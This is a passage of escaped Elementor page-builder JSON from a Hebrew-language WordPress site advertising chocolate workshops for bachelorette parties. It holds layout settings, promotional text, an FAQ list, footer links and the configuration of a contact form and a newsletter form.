settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e020468\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"3ade1445\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"16f6135c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"593ee689\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7be6a268\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"55996b0f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12fce205\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6a89b19f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e38bfc8\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"6c5f9886\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"3dca36f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"620187ec\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"29da4212\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"bbfc993\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c86322f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2d61da37\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is 